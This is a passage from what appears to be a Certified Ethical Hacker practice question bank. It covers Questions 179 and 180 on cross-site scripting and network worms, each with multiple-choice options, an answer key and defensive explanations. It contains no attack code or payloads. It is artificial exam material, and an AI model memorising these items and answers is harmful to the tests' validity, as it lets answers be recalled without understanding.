D) Bluejacking is the act of sending unsolicited messages via Bluetooth to nearby devices. It is generally harmless and unrelated to packet capture or data interception.
Packet sniffing is a core skill for CEH professionals, as it highlights vulnerabilities in network communications. Understanding how data packets can be intercepted, decoded, and analyzed allows ethical hackers to recommend strong encryption practices, secure protocols, and traffic monitoring solutions. Mastery of packet sniffing also underpins network intrusion detection, penetration testing, and threat analysis, enabling organizations to preemptively secure their wireless and wired networks against malicious eavesdropping.
Question 179
Which attack exploits web applications by inserting malicious scripts into client-side code executed by a browser?
A) SQL Injection
B) Cross-Site Scripting (XSS)
C) Command Injection
D) Directory Traversal
Answer: B
Explanation:
A) SQL Injection targets databases by inserting malicious SQL commands to manipulate or retrieve data. While serious, it primarily affects the server-side database rather than client-side execution.
B) Cross-Site Scripting (XSS) is correct. XSS occurs when attackers inject malicious scripts into web pages, which are executed in a victim’s browser. This can lead to cookie theft, session hijacking, or unauthorized actions on behalf of the user. There are different types of XSS attacks: stored, reflected, and DOM-based, each with specific use cases and detection challenges. Ethical hackers must learn to test web applications for input validation flaws, output encoding deficiencies, and inadequate content security policies to prevent XSS vulnerabilities. Defense strategies include sanitizing inputs, implementing CSP headers, and using secure coding practices.
C) Command Injection exploits server-side execution commands, not client-side scripts in a browser. It allows attackers to execute arbitrary commands on a server hosting the web application.
D) Directory Traversal attacks aim to access restricted files on a server by manipulating file paths. While critical, it does not involve client-side script execution.
Understanding XSS is vital for CEH candidates because it demonstrates how poorly validated input or output encoding can compromise client security. XSS attacks can target end-users directly, bypassing server security mechanisms. By mastering detection and prevention techniques, ethical hackers can secure web applications, protect sensitive data, and mitigate risks of session hijacking and credential theft. Security best practices include input filtering, secure frameworks, and user education, which together strengthen web application defenses against XSS attacks.
Question 180
Which malware type spreads automatically across networks without user intervention?
A) Worm
B) Trojan
C) Spyware
D) Adware
Answer: A
Explanation:
A) Worm is correct. Worms are self-replicating malware that propagate automatically across networks by exploiting vulnerabilities. Unlike viruses, worms do not require user action to spread. They can rapidly infect multiple systems, consume bandwidth, and cause network congestion or outages. Examples include Morris Worm, WannaCry, and Conficker. Ethical hackers study worms to understand infection mechanisms, propagation techniques, and containment strategies, ensuring proper network defense and incident response planning.
B) Trojans rely on user interaction to execute and do not self-replicate across networks. They often disguise themselves as legitimate applications to trick users into installation.
C) Spyware collects information covertly from the user’s system, but it does not spread automatically. It relies on installation vectors like downloads or phishing.
D) Adware delivers unwanted advertisements and may track user behavior but does not autonomously propagate across networks.
Understanding worms is essential for CEH professionals to design effective security controls such as firewalls, intrusion detection/prevention systems, and patch management. Worm analysis also informs incident response procedures, isolation techniques, and remediation strategies. Studying worm behavior highlights the importance of network segmentation, vulnerability management, and continuous monitoring in maintaining cybersecurity. By recognizing the rapid spread and potential damage of worms, ethical hackers can implement proactive measures to protect critical systems and networks from uncontrolled malware outbreaks.